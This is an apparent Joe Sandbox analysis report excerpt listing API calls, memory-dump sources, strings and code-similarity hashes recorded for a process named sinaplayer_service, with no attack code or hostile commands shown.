                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ByteCharMultiWide$String__crt_freea_s
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2471089800-0
                                                                                                                                                                                                    • Opcode ID: e9b7e301108fdf05713d4138058e4d94811d059c24fadcc45b312c62f408c0a8
                                                                                                                                                                                                    • Instruction ID: 34ae5b530881840237915a40310f36dea0d887eb8127a6f7cdcfc37c8750875f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e9b7e301108fdf05713d4138058e4d94811d059c24fadcc45b312c62f408c0a8
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C851C171A0125AAFEF24CE65CC54FAF36A9EB89314F10065AFC19D7A50D772DC9087A0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,?,?,?,?,?,00000000,?,?), ref: 6C562E94
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ByteCharMultiWide
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 626452242-0
                                                                                                                                                                                                    • Opcode ID: 99ed86786a81d705fa76452bfc77380f0c7fabcecf4dc8b423cd5f95bf9a06ef
                                                                                                                                                                                                    • Instruction ID: 92204265a4215fb6ae953dfcca2c4fe22f184541e33617bd6fb841a4e99436a8
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 99ed86786a81d705fa76452bfc77380f0c7fabcecf4dc8b423cd5f95bf9a06ef
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A8418331A05256DFDB118F6ACC48BAF7BA8AF46719F200565E869D79A0DF30CC11C7A1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?AsUTF8Unsafe@FilePath@base@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ.BASE(?,8285FFAB), ref: 00380AD2
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?,?,6C6C52C0), ref: 00380AFC
                                                                                                                                                                                                    • ??0FileEnumerator@base@@QAE@ABVFilePath@1@_NH@Z.BASE(8285FFAB,00000001,00000003,?,6C6C52C0), ref: 00380B2C
                                                                                                                                                                                                    • ?Next@FileEnumerator@base@@QAE?AVFilePath@2@XZ.BASE(000000FF), ref: 00380B43
                                                                                                                                                                                                    • ?Next@FileEnumerator@base@@QAE?AVFilePath@2@XZ.BASE(?), ref: 00380B93
                                                                                                                                                                                                    • ??4FilePath@base@@QAEAAV01@ABV01@@Z.BASE(00000000), ref: 00380BA1
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 00380BAE
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 00380BBD
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 00380BD9
                                                                                                                                                                                                      • Part of subcall function 00380560: ??0FilePath@base@@QAE@XZ.BASE(8285FFAB), ref: 003805AA
                                                                                                                                                                                                      • Part of subcall function 00380560: ?AppendRelativePath@FilePath@base@@QBE_NABV12@PAV12@@Z.BASE(00000000,?), ref: 003805BE
                                                                                                                                                                                                      • Part of subcall function 00380560: ?AsUTF8Unsafe@FilePath@base@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ.BASE(?), ref: 003805D2
                                                                                                                                                                                                      • Part of subcall function 00380560: ?ReplaceSubstringsAfterOffset@@YAXPAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IABV12@1@Z.BASE(?,00000000,00000000,00000000,0039E4E0,00000001,0039E4DC,00000001), ref: 00380634
                                                                                                                                                                                                      • Part of subcall function 00380560: ??3@YAXPAX@Z.MSVCR120(00000000), ref: 00380646
                                                                                                                                                                                                      • Part of subcall function 00380560: ??3@YAXPAX@Z.MSVCR120(00000000), ref: 0038066D
                                                                                                                                                                                                      • Part of subcall function 00380560: ?DirectoryExists@base@@YA_NABVFilePath@1@@Z.BASE(00000000), ref: 00380676
                                                                                                                                                                                                    • ??1FileEnumerator@base@@QAE@XZ.BASE ref: 00380BEE
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: File$Path@base@@$Enumerator@base@@$??3@D@2@@std@@D@std@@U?$char_traits@V?$allocator@V?$basic_string@$Next@Path@2@Unsafe@$AfterAppendDirectoryExists@base@@Offset@@Path@Path@1@@Path@1@_RelativeReplaceSubstringsV01@V01@@V12@V12@1@V12@@
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 702793742-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 00374FE0: ?_Xout_of_range@std@@YAXPBD@Z.MSVCP120(invalid string position,?,?,?,?,00375150,?,?,?,?,?,?,00371E69,?,?), ref: 00374FFA
                                                                                                                                                                                                      • Part of subcall function 00374FE0: ?_Xout_of_range@std@@YAXPBD@Z.MSVCP120(invalid string position,?,?,?,?,00375150,?,?,?,?,?,?,00371E69,?,?), ref: 0037501A
                                                                                                                                                                                                    • ??1?$basic_ios@_WU?$char_traits@_W@std@@@std@@UAE@XZ.MSVCP120 ref: 0038D132
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 0038D141
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Xout_of_range@std@@$??1?$basic_ios@_??3@U?$char_traits@_W@std@@@std@@
                                                                                                                                                                                                    • String ID: .$.txt$chs
                                                                                                                                                                                                    • API String ID: 495842565-1930578300
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 0038FBC0: EnterCriticalSection.KERNEL32(0038EBA0,8285FFAB,?,00000000,?), ref: 0038FC0A
                                                                                                                                                                                                      • Part of subcall function 0038FBC0: EnterCriticalSection.KERNEL32(0038EBA0), ref: 0038FC17
                                                                                                                                                                                                      • Part of subcall function 0038FBC0: LoadLibraryW.KERNEL32(rpcrt4.dll), ref: 0038FC28
                                                                                                                                                                                                      • Part of subcall function 0038FBC0: LeaveCriticalSection.KERNEL32(0038EBA0), ref: 0038FC3B
                                                                                                                                                                                                      • Part of subcall function 0038FBC0: GetProcAddress.KERNEL32(?,UuidCreate), ref: 0038FC51
                                                                                                                                                                                                      • Part of subcall function 0038FBC0: LeaveCriticalSection.KERNEL32(0038EBA0), ref: 0038FC64
                                                                                                                                                                                                    • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000001,00000080,00000000,00000000,8285FFAB,?,00000000,?,003904E5,?,?,00000000), ref: 00390398
                                                                                                                                                                                                    • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000001,00000080,00000000), ref: 003903CE
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 003903DC
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(00000000), ref: 003903ED
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 00390412
                                                                                                                                                                                                      • Part of subcall function 0038FE70: memset.MSVCR120 ref: 0038FFBF
                                                                                                                                                                                                      • Part of subcall function 0038FE70: memset.MSVCR120 ref: 0038FFD2
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,00000000,00000007,?,?,0038EBA0,?,00000000,00000000,00000000), ref: 003904A5
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 003904B1
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalSection$CloseHandle$??3@CreateEnterFileLeavememset$AddressLibraryLoadProc
                                                                                                                                                                                                    • String ID: -full.dmp
                                                                                                                                                                                                    • API String ID: 3657708945-2448600480
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?_Xlength_error@std@@YAXPBD@Z.MSVCP120(string too long,?,00379620,6C6C52C0,89,0037E213,89,00379620,?,00379620,?,?,?,003764FB,00000000,?), ref: 0037E0BD
                                                                                                                                                                                                    • memmove.MSVCR120(?,?,E8FFFFFF,00379620,00000000,?,00379620,6C6C52C0,89,0037E213,89,00379620,?,00379620,?,?), ref: 0037E11B
                                                                                                                                                                                                    • memmove.MSVCR120(0039E338,0039E338,0001DECC,00379620,00000000,?,00379620,6C6C52C0,89,0037E213,89,00379620,?,00379620,?,?), ref: 0037E164
                                                                                                                                                                                                    • memcpy.MSVCR120(00379620,00379620,E8FFFFFF,00379620,00000000,?,00379620,6C6C52C0,89,0037E213,89,00379620,?,00379620,?,?), ref: 0037E193
                                                                                                                                                                                                    • ?_Xout_of_range@std@@YAXPBD@Z.MSVCP120(invalid string position,?,00379620,6C6C52C0,89,0037E213,89,00379620,?,00379620,?,?,?,003764FB,00000000,?), ref: 0037E1B3
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: memmove$Xlength_error@std@@Xout_of_range@std@@memcpy
                                                                                                                                                                                                    • String ID: 89$invalid string position$string too long
                                                                                                                                                                                                    • API String ID: 2530380750-3118988713
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: memset$CrackInternetprintf
                                                                                                                                                                                                    • String ID: <$Error:InternetCrackUrl failed!
                                                                                                                                                                                                    • API String ID: 514117978-3291073569
                                                                                                                                                                                                    • Opcode ID: ecde6387cfbb8d328625b37260eddcc2f9053a3c5300c29d17c075522fffd9e2
                                                                                                                                                                                                    • Instruction ID: b455b56574e6de1220137752066c27e288ace0012bbbd89c12686009c36452dd
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ecde6387cfbb8d328625b37260eddcc2f9053a3c5300c29d17c075522fffd9e2
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0F51D7719442199BDB35DF14CC45BEBB3B9FF04304F00459AE50AAB681EB76AB94CF90
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _getptd.MSVCR120(6C57CF58,00000010,6C57CFF4,000000FD,6C57CD81), ref: 6C57CE6B
                                                                                                                                                                                                      • Part of subcall function 6C56F81C: _getptd.MSVCR120(6C56F8A8,0000000C,6C56F8E3,00000000,?,6C57E01F,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 6C56F82D
                                                                                                                                                                                                      • Part of subcall function 6C56F81C: _lock.MSVCR120(0000000D,6C56F8A8,0000000C,6C56F8E3,00000000,?,6C57E01F,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 6C56F845
                                                                                                                                                                                                    • _malloc_crt.MSVCR120(00000220,6C57CF58,00000010,6C57CFF4,000000FD,6C57CD81), ref: 6C57CE97
                                                                                                                                                                                                      • Part of subcall function 6C562226: malloc.MSVCR120(6C5CC0AD,6C633B90,6C633B90,?,?,6C5CC0AD,?,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 6C562237
                                                                                                                                                                                                      • Part of subcall function 6C578C4C: IsValidCodePage.KERNEL32(-00000030,00000000,00000000,00000000), ref: 6C578CAC
                                                                                                                                                                                                      • Part of subcall function 6C578C4C: GetCPInfo.KERNEL32(00000000,?), ref: 6C578CBB
                                                                                                                                                                                                      • Part of subcall function 6C578C4C: memset.MSVCR120(00000019,00000000,00000101), ref: 6C578CD3
                                                                                                                                                                                                    • _lock.MSVCR120(0000000D), ref: 6C57CF16
                                                                                                                                                                                                    • free.MSVCR120(?,6C57CF58,00000010,6C57CFF4,000000FD,6C57CD81), ref: 6C5A759E
                                                                                                                                                                                                    Strings
Memory Dump Source
• Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
• Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _getptd_lock$CodeInfoPageValid_malloc_crtfreemallocmemset
                                                                                                                                                                                                    • String ID: xw
                                                                                                                                                                                                    • API String ID: 1238899101-2371563245
                                                                                                                                                                                                    • Opcode ID: d0ddb3a65bf8ecf45e4776ff17183d54dc520716468e8ffab379f57bbc1f52af
                                                                                                                                                                                                    • Instruction ID: 921bd7be188132c53fc24621fbc7beda776a0028405a1dbfdcd3482b04945d03
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d0ddb3a65bf8ecf45e4776ff17183d54dc520716468e8ffab379f57bbc1f52af
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7641E871A05250CFCB25EF6DCC80A9977F0AB4A364F140569E8549BFD1CB74ACC2CBA5
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?Get@PathService@@SA_NHPAVFilePath@base@@@Z.BASE(00000003), ref: 0037FD90
                                                                                                                                                                                                    • ?Append@FilePath@base@@QBE?AV12@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.BASE(?,?), ref: 0037FDC5
                                                                                                                                                                                                    • ?PathExists@base@@YA_NABVFilePath@1@@Z.BASE(00000000), ref: 0037FDD0
                                                                                                                                                                                                      • Part of subcall function 003723E0: ??3@YAXPAX@Z.MSVCR120(?,00000000,0038B4CE,00000000), ref: 003723EB
                                                                                                                                                                                                    • ??4FilePath@base@@QAEAAV01@ABV01@@Z.BASE(00000000), ref: 0037FE2C
                                                                                                                                                                                                    • ?DirName@FilePath@base@@QBE?AV12@XZ.BASE(?), ref: 0037FE65
                                                                                                                                                                                                    • ??4FilePath@base@@QAEAAV01@ABV01@@Z.BASE(00000000), ref: 0037FE8A
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 003802B5
                                                                                                                                                                                                    Strings
Memory Dump Source
• Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
• Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: File$Path@base@@$PathV01@V01@@V12@$??3@Append@Exists@base@@Get@Name@Path@1@@Path@base@@@Service@@U?$char_traits@_V?$allocator@_V?$basic_string@_W@2@@std@@@W@std@@
                                                                                                                                                                                                    • String ID: sinaplayer.exe
                                                                                                                                                                                                    • API String ID: 1139831594-3097596253
                                                                                                                                                                                                    • Opcode ID: 26c5063ead3ad56e7cb34bba465393ff2b6e4c78c02aa9d2d17dc034e80b9013
                                                                                                                                                                                                    • Instruction ID: 5a08e3bd98e0a45c30c16dcbc51abaced5f1424a27aee08c00382618e44a6362
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 26c5063ead3ad56e7cb34bba465393ff2b6e4c78c02aa9d2d17dc034e80b9013
                                                                                                                                                                                                    • Instruction Fuzzy Hash: EF41B130905298DEDF66E7A8CC59BEDBBB8AF16304F1041DAD40EA3291DF341B48CB21
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • malloc.MSVCR120(00000008,00000000), ref: 6C5B8FBC
                                                                                                                                                                                                      • Part of subcall function 6C55ED30: HeapAlloc.KERNEL32(00EB0000,00000000,6C5CC0AD,00000000,?,00000000,?,6C56223C,6C5CC0AD,6C633B90,6C633B90,?,?,6C5CC0AD,?,00000000), ref: 6C55ED5D
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(?,00000001,00000000), ref: 6C5B8FFA
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,6C57C7FC,?,00000001,00000000), ref: 6C5B900F
                                                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 6C5B901C
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(0000001C,0000001C,6C5C7D40,6C5C7DB6), ref: 6C5B9025
                                                                                                                                                                                                    • ??0scoped_lock@critical_section@Concurrency@@QAE@AAV12@@Z.MSVCR120(?,0000001C,6C5C7D40,6C5C7DB6), ref: 6C5B907E
                                                                                                                                                                                                    • ?unlock@critical_section@Concurrency@@QAEXXZ.MSVCR120(?,0000001C,6C5C7D40,6C5C7DB6), ref: 6C5B90A0
                                                                                                                                                                                                    Strings
Memory Dump Source
• Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
• Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Concurrency@@$??0scoped_lock@critical_section@??2@?unlock@critical_section@AllocExceptionH_prolog3HeapThrowV12@@mallocstd::exception::exception
                                                                                                                                                                                                    • String ID: bad allocation
                                                                                                                                                                                                    • API String ID: 3930479332-2104205924
                                                                                                                                                                                                    • Opcode ID: b450f568cad95fb5190385ec2ad32b2b8ed590d469b60141e9a39676e759694a
                                                                                                                                                                                                    • Instruction ID: 90743ae9b64160c210ed39990e6e19a774881fde93b2d08ec03206f4a7ff1148
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b450f568cad95fb5190385ec2ad32b2b8ed590d469b60141e9a39676e759694a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5D318C7190170ADBC724DF25C8A1A8ABFF4FF50314F10892ED8556BB50DB71AA49CB91
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog3_GS.LIBCMT ref: 6C5C88F2
                                                                                                                                                                                                    • malloc.MSVCR120(?,00000020,6C5C921D,?,?,?), ref: 6C5C895D
                                                                                                                                                                                                      • Part of subcall function 6C55ED30: HeapAlloc.KERNEL32(00EB0000,00000000,6C5CC0AD,00000000,?,00000000,?,6C56223C,6C5CC0AD,6C633B90,6C633B90,?,?,6C5CC0AD,?,00000000), ref: 6C55ED5D
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(00000000,00000001,00000020,6C5C921D,?,?,?), ref: 6C5C8989
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,6C57C7FC,00000000,00000001,00000020,6C5C921D,?,?,?), ref: 6C5C899E
                                                                                                                                                                                                    • ?wait_for_multiple@event@Concurrency@@SAIPAPAV12@I_NI@Z.MSVCR120(00000000,00000002,00000001,000000FF,00000020,6C5C921D,?,?,?), ref: 6C5C89CE
                                                                                                                                                                                                    • _freea_s.MSVCR120(00000000,00000000,00000002,00000001,000000FF,00000020,6C5C921D,?,?,?), ref: 6C5C89D4
                                                                                                                                                                                                    • ?wait@event@Concurrency@@QAEII@Z.MSVCR120(000000FF,00000020,6C5C921D,?,?,?), ref: 6C5C89E3
                                                                                                                                                                                                    Strings
Memory Dump Source
• Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
• Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Concurrency@@$?wait@event@?wait_for_multiple@event@AllocExceptionH_prolog3_HeapThrowV12@_freea_smallocstd::exception::exception
                                                                                                                                                                                                    • String ID: bad allocation
                                                                                                                                                                                                    • API String ID: 559173246-2104205924
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
• Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: NameName::
                                                                                                                                                                                                    • String ID: ,...$,<ellipsis>$...$<ellipsis>$void
                                                                                                                                                                                                    • API String ID: 1333004437-2211150622
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 6C55F764: _getptd.MSVCR120(00000001,00000000,?,6C57E01F,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 6C55F77A
                                                                                                                                                                                                    • __crtCompareStringA.MSVCR120(?,?,00001001,00ED4598,?,?,?,00000000,00000000,?,7FFFFFFF,00000000,?,xL,00ED4598,00ED4C78), ref: 6C566FAF
                                                                                                                                                                                                    • _strnicmp_l.MSVCR120(00ED4598,?,?,?,00000000,?,7FFFFFFF,00000000,?,xL,00ED4598,00ED4C78,00000000,00ED4598,00000000,00000000), ref: 6C57E3F6
                                                                                                                                                                                                    • _errno.MSVCR120(00000000,?,7FFFFFFF,00000000,?,xL,00ED4598,00ED4C78,00000000,00ED4598,00000000,00000000,00000000), ref: 6C5AAB98
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(00000000,?,7FFFFFFF,00000000,?,xL,00ED4598,00ED4C78,00000000,00ED4598,00000000,00000000,00000000), ref: 6C5AABA3
